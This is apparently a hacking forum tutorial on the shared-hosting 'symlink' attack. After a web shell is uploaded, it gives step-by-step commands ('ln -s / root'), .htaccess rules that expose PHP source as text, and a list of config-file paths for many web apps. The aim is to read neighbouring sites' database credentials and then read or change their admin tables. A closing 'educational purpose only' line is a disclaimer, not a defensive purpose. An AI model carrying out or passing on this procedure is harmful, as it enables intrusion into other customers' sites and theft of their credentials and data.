Hello Guys, Today I'm going to explain how to symlink websites in two different methods.
So Lets Start!
[#] Explanation
First I will explain what symlink can do, Symlinking is making Symbolic
links to other websites on the same server to read their configuration
files, connect to their database, and get the information needed to get
access to their Control panel.
and that's about it :)
[#] Method #1
After uploading you shell on the server make a directory with the command bellow:
mkdir sym
NOTE:- The directory can be called whatever you want, just change the "sym" to any name.
Enter your new directory then upload OR create a file called ".htaccess" in the new directory with the code bellow inside it:
Options all
DirectoryIndex Sux.html
AddType text/plain .php
AddHandler server-parsed .php
AddType text/plain .html
AddHandler txt .html
Require None
Satisfy Any
Like this picture:
After that, we will run the command bellow to create a symlink to "/" directory:
ln -s / root
and it will look like this:
And if we opened the directory "sym" from our browser like "www.website.com/sym"
it should look like this:
in the image above my shell was in /downloads so I made "sym" directory inside /downloads
and our process is almost done, now we just have to get the user of the target website.
I've provided user.php code in the bottom of the post, this script will
give you all the websites on the server and their username.
when you get the username of your target, just open the link like this:
www.website.com/sym/root/home/(user)/public_html
where (user) = the user of the target
here is a picture for example:
where the user was "hillock"
now the next step is easy, we will start looking for the configuration its usually called config.php, or configuration.php.
here are the location of configuration files in the most famous webapps out there.
vBulletin -- /includes/config.php
IPB -- /conf_global.php
MyBB -- /inc/config.php
Phpbb -- /config.php
Php Nuke -- /config.php
Php-Fusion -- config.php
SMF -- /Settings.php
Joomla -- configuration.php , configuration.php-dist
WordPress -- /wp-config.php
Drupal -- /sites/default/settings.php
Oscommerce -- /includes/configure.php
e107 -- /e107_config.php
Seditio -- /datas/config.php
when you find the configuration file, it will contain the database details.
it will look like the image bellow (image bellow is joomla configuration file):
now upload SQL.php (code provided bellow)
and connect to the database.
Congrats :) now you can get all the details from admin table, and even change it.
[#] Method #2
In this method, we wont symlink the root directory, we will symlink the target's public_html dir directly.
To do this, just follow those steps,
1. Make the a new directory, just like method 1
2. make ".htaccess" OR upload it with the code bellow:
Options Indexes FollowSymlinks
DirectoryIndex z0mbie.htm
AddType txt .php
AddHandler txt .php
3. run the following comman:
ln -s /home/(user)/public_html (user)
where (user) = the target's user
and it will look like this when we open it in our browser:
in the picture the user name of my target was "csseipsn"
now you just have to find the configuration and connect :)
Scripts Needed:
User.php Source Code
SQL.php Source Code
LIKE ALWAYS ITS ONLY FOR EDUCATIONAL PURPOSE ONLY!
Source: Security Geeks
.gif)
